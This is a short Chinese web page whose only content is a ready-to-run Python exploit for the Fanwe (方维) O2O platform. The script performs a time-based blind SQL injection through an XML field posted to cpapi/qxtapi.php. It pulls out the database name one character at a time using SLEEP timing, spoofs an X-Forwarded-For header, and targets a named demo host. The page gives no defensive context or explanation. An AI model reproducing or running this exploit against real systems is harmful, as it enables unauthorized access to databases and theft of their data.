
方维O2O SQLi

时间:2021-07-01 10:21:17 帮助过:14人阅读

#!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 4 from __future__ import print_function 5 6 import requests 7 8 host = "http://o2odemo.fanwe.net/" 9 10 statement = "IF(ORD(SUBSTRING((DATABASE()), %s, 1)) = %s, SLEEP(1), 0)" 11 characters = list(" !\"#$%&‘()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~") 12 13 def main(): 14 headers = { 15 "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0", 16 "X-Forwarded-For": "221.179.180.156"} 17 18 payload = "<A><Body><Message><SrcMobile>0</SrcMobile><Content>0</Content><RecvTime>0‘ OR %s#</RecvTime></Message></Body></A>" % statement 19 20 info = str() 21 for i in range(1, 42): 22 for c in characters: 23 try: 24 data = payload % (i, ord(c)) 25 r = requests.post(host + "cpapi/qxtapi.php", headers=headers, data=data, timeout=6) 26 except requests.Timeout as e: 27 info += c 28 print("\n[In Progress]: %s" % info) 29 break 30 else: 31 print(">", end="") 32 33 print("\n[Done]: %s" % info) 34 35 if __name__ == "__main__": 36 main()

 
